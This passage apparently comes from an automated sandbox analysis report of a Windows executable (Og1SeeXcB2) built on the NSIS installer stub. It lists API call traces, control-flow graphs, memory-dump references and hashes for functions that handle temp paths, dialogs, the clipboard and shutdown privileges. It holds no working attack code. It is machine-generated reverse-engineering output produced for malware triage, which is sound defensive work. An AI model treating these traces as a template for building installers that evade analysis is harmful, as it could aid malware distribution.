                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403703
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040370B
                                                                                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371C
                                                                                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403724
                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403738
                                                                                                                                                                                                                                    • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000007,?,00000007,00000009,0000000B), ref: 004037FE
                                                                                                                                                                                                                                  • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403803
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403824
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403837
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403846
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403851
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 0040385D
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403879
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 004038D3
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00438800,00420EC8,00000001,?,00000007,00000009,0000000B), ref: 004038E7
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000,?,00000007,00000009,0000000B), ref: 00403914
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403943
                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040394A
                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395F
                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403982
                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A7
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004039CA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                  • String ID: .tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                  • API String ID: 424501083-2960561200
                                                                                                                                                                                                                                  • Opcode ID: 4142f676c30d984fe1eee6ce44353d56b481e52f69567ab9cce989c988914f15
                                                                                                                                                                                                                                  • Instruction ID: 80ab2d28ddbf02fe5cd82fe477cea5b095f50d567d4594062ccc97c7db5cb5a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4142f676c30d984fe1eee6ce44353d56b481e52f69567ab9cce989c988914f15
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D107B0204310ABD7207F659E45A3B3AACEB4470AF11447FF481F62E1DBBD8956876E
                                                                                                                                                                                                                                  Function 00405582 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 137 405582-40559d 138 4055a3-40566a GetDlgItem * 3 call 404366 call 404cbf GetClientRect GetSystemMetrics SendMessageW * 2 137->138 139 40572c-405733 137->139 157 405688-40568b 138->157 158 40566c-405686 SendMessageW * 2 138->158 141 405735-405757 GetDlgItem CreateThread FindCloseChangeNotification 139->141 142 40575d-40576a 139->142 141->142 144 405788-405792 142->144 145 40576c-405772 142->145 149 405794-40579a 144->149 150 4057e8-4057ec 144->150 147 405774-405783 ShowWindow * 2 call 404366 145->147 148 4057ad-4057b6 call 404398 145->148 147->144 161 4057bb-4057bf 148->161 154 4057c2-4057d2 ShowWindow 149->154 155 40579c-4057a8 call 40430a 149->155 150->148 152 4057ee-4057f4 150->152 152->148 159 4057f6-405809 SendMessageW 152->159 162 4057e2-4057e3 call 40430a 154->162 163 4057d4-4057dd call 405443 154->163 155->148 166 40569b-4056b2 call 404331 157->166 167 40568d-405699 SendMessageW 157->167 158->157 168 40590b-40590d 159->168 169 40580f-40583a CreatePopupMenu call 406418 AppendMenuW 159->169 162->150 163->162 176 4056b4-4056c8 ShowWindow 166->176 177 4056e8-405709 GetDlgItem SendMessageW 166->177 167->166 168->161 174 40583c-40584c GetWindowRect 169->174 175 40584f-405864 TrackPopupMenu 169->175 174->175 175->168 179 40586a-405881 175->179 180 4056d7 176->180 181 4056ca-4056d5 ShowWindow 176->181 177->168 178 40570f-405727 SendMessageW * 2 177->178 178->168 182 405886-4058a1 SendMessageW 179->182 183 4056dd-4056e3 call 404366 180->183 181->183 182->182 184 4058a3-4058c6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 4058c8-4058ef SendMessageW 184->186 186->186 187 4058f1-405905 GlobalUnlock SetClipboardData CloseClipboard 186->187 187->168
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 004055E0
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004055EF
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040562C
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405633
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405654
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405665
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405678
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405686
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405699
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056BB
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004056CF
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004056F0
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405700
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405719
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405725
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004055FE
                                                                                                                                                                                                                                    • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405742
                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005516,00000000), ref: 00405750
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405757
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 0040577B
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405780
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 004057CA
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057FE
                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 0040580F
                                                                                                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405823
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00405843
                                                                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040585C
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405894
                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004058A4
                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004058AA
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058B6
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004058C0
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058D4
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004058F4
                                                                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004058FF
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00405905
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                  • String ID: {
                                                                                                                                                                                                                                  • API String ID: 4154960007-366298937
                                                                                                                                                                                                                                  • Opcode ID: 30274ff220e81b54042d5ec4385cd695e560e63cfee1f62d03a7a46aa2ec4b26
                                                                                                                                                                                                                                  • Instruction ID: 548bfd7703c7e8b67cc6bd423be8dd859740628245fa72e8840ee51ebf386eb0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30274ff220e81b54042d5ec4385cd695e560e63cfee1f62d03a7a46aa2ec4b26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0B159B0900609FFDB11AF61DD89AAE7B79FB44354F00803AFA45B61A0C7754E51DF68
                                                                                                                                                                                                                                  Function 00406AFA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 653 406afa-406aff 654 406b70-406b8e 653->654 655 406b01-406b30 653->655 658 407166-40717b 654->658 656 406b32-406b35 655->656 657 406b37-406b3b 655->657 659 406b47-406b4a 656->659 660 406b43 657->660 661 406b3d-406b41 657->661 662 407195-4071ab 658->662 663 40717d-407193 658->663 665 406b68-406b6b 659->665 666 406b4c-406b55 659->666 660->659 661->659 664 4071ae-4071b5 662->664 663->664 669 4071b7-4071bb 664->669 670 4071dc-4071e8 664->670 671 406d3d-406d5b 665->671 667 406b57 666->667 668 406b5a-406b66 666->668 667->668 674 406bd0-406bfe 668->674 675 4071c1-4071d9 669->675 676 40736a-407374 669->676 682 40697e-406987 670->682 672 406d73-406d85 671->672 673 406d5d-406d71 671->673 680 406d88-406d92 672->680 673->680 678 406c00-406c18 674->678 679 406c1a-406c34 674->679 675->670 681 407380-407393 676->681 684 406c37-406c41 678->684 679->684 687 406d94 680->687 688 406d35-406d3b 680->688 683 407398-40739c 681->683 685 407395 682->685 686 40698d 682->686 690 406c47 684->690 691 406bb8-406bbe 684->691 685->683 692 406994-406998 686->692 693 406ad4-406af5 686->693 694 406a39-406a3d 686->694 695 406aa9-406aad 686->695 696 406d10-406d14 687->696 697 406ea5-406eb2 687->697 688->671 689 406cd9-406ce3 688->689 698 407328-407332 689->698 699 406ce9-406d0b 689->699 715 407304-40730e 690->715 716 406b9d-406bb5 690->716 700 406c71-406c77 691->700 701 406bc4-406bca 691->701 692->681 707 40699e-4069ab 692->707 693->658 704 406a43-406a5c 694->704 705 4072e9-4072f3 694->705 708 406ab3-406ac7 695->708 709 4072f8-407302 695->709 702 406d1a-406d32 696->702 703 40731c-407326 696->703 697->682 698->681 699->697 710 406cd5 700->710 712 406c79-406c97 700->712 701->674 701->710 702->688 703->681 711 406a5f-406a63 704->711 705->681 707->685 713 4069b1-4069f7 707->713 714 406aca-406ad2 708->714 709->681 710->689 711->694 717 406a65-406a6b 711->717 718 406c99-406cad 712->718 719 406caf-406cc1 712->719 720 4069f9-4069fd 713->720 721 406a1f-406a21 713->721 714->693 714->695 715->681 716->691 724 406a95-406aa7 717->724 725 406a6d-406a74 717->725 726 406cc4-406cce 718->726 719->726 727 406a08-406a16 GlobalAlloc 720->727 728 4069ff-406a02 GlobalFree 720->728 722 406a23-406a2d 721->722 723 406a2f-406a37 721->723 722->722 722->723 723->711 724->714 729 406a76-406a79 GlobalFree 725->729 730 406a7f-406a8f GlobalAlloc 725->730 726->700 731 406cd0 726->731 727->685 732 406a1c 727->732 728->727 729->730 730->685 730->724 734 407310-40731a 731->734 735 406c56-406c6e 731->735 732->721 734->681 735->700
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                                                                                                                                                                                  • Instruction ID: 1b8bdd5ad4fc83de7ba6cec7d94a6212227b50c179fbf06187fd9840cc1d6bdc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44F18770D04229CBDF18CFA8C8946ADBBB1FF45305F25816ED852BB281D7386A86DF45
                                                                                                                                                                                                                                  Function 00406739 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 773 406739-40674d FindFirstFileW 774 40675a 773->774 775 40674f-406758 FindClose 773->775 776 40675c-40675d 774->776 775->776
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405E01,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406744
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406750
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                  • String ID: XgB
                                                                                                                                                                                                                                  • API String ID: 2295610775-796949446
                                                                                                                                                                                                                                  • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                                                                                  • Instruction ID: 870aa7139b81afaf1942c507467f7acad87ed8de72819481db2edd1f78cd0942
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09D012316042305FC35127387E4C84B7B9A9F563393228B76B5AAF21E0C7748C3287AC
                                                                                                                                                                                                                                  Function 00403E58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 188 403e58-403e6a 189 403e70-403e76 188->189 190 403fab-403fba 188->190 189->190 191 403e7c-403e85 189->191 192 404009-40401e 190->192 193 403fbc-404004 GetDlgItem * 2 call 404331 SetClassLongW call 40140b 190->193 194 403e87-403e94 SetWindowPos 191->194 195 403e9a-403e9d 191->195 197 404020-404023 192->197 198 40405e-404063 call 40437d 192->198 193->192 194->195 199 403eb7-403ebd 195->199 200 403e9f-403eb1 ShowWindow 195->200 202 404025-404030 call 401389 197->202 203 404056-404058 197->203 205 404068-404083 198->205 206 403ed9-403edc 199->206 207 403ebf-403ed4 DestroyWindow 199->207 200->199 202->203 225 404032-404051 SendMessageW 202->225 203->198 210 4042fe 203->210 211 404085-404087 call 40140b 205->211 212 40408c-404092 205->212 216 403ede-403eea SetWindowLongW 206->216 217 403eef-403ef5 206->217 213 4042db-4042e1 207->213 215 404300-404307 210->215 211->212 221 404098-4040a3 212->221 222 4042bc-4042d5 DestroyWindow KiUserCallbackDispatcher 212->222 213->210 220 4042e3-4042e9 213->220 216->215 223 403f98-403fa6 call 404398 217->223 224 403efb-403f0c GetDlgItem 217->224 220->210 226 4042eb-4042f4 ShowWindow 220->226 221->222 227 4040a9-4040f6 call 406418 call 404331 * 3 GetDlgItem 221->227 222->213 223->215 228 403f2b-403f2e 224->228 229 403f0e-403f25 SendMessageW IsWindowEnabled 224->229 225->215 226->210 258 404100-40413c ShowWindow KiUserCallbackDispatcher call 404353 EnableWindow 227->258 259 4040f8-4040fd 227->259 233 403f30-403f31 228->233 234 403f33-403f36 228->234 229->210 229->228 236 403f61-403f66 call 40430a 233->236 237 403f44-403f49 234->237 238 403f38-403f3e 234->238 236->223 239 403f4b-403f51 237->239 240 403f7f-403f92 SendMessageW 237->240 238->240 243 403f40-403f42 238->243 244 403f53-403f59 call 40140b 239->244 245 403f68-403f71 call 40140b 239->245 240->223 243->236 254 403f5f 244->254 245->223 255 403f73-403f7d 245->255 254->236 255->254 262 404141 258->262 263 40413e-40413f 258->263 259->258 264 404143-404171 GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 404173-404184 SendMessageW 264->265 266 404186 264->266 267 40418c-4041cb call 404366 call 403e39 call 4063db lstrlenW call 406418 SetWindowTextW call 401389 265->267 266->267 267->205 278 4041d1-4041d3 267->278 278->205 279 4041d9-4041dd 278->279 280 4041fc-404210 DestroyWindow 279->280 281 4041df-4041e5 279->281 280->213 283 404216-404243 CreateDialogParamW 280->283 281->210 282 4041eb-4041f1 281->282 282->205 284 4041f7 282->284 283->213 285 404249-4042a0 call 404331 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 283->285 284->210 285->210 290 4042a2-4042b5 ShowWindow call 40437d 285->290 292 4042ba 290->292 292->213
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E94
                                                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00403EB1
                                                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00403EC5
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EE1
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403F02
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F16
                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F1D
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403FCB
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403FD5
                                                                                                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403FEF
                                                                                                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404040
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 004040E6
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00404107
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404119
                                                                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404134
                                                                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414A
                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00404151
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404169
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040417C
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004041A6
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00423708), ref: 004041BA
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004042EE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
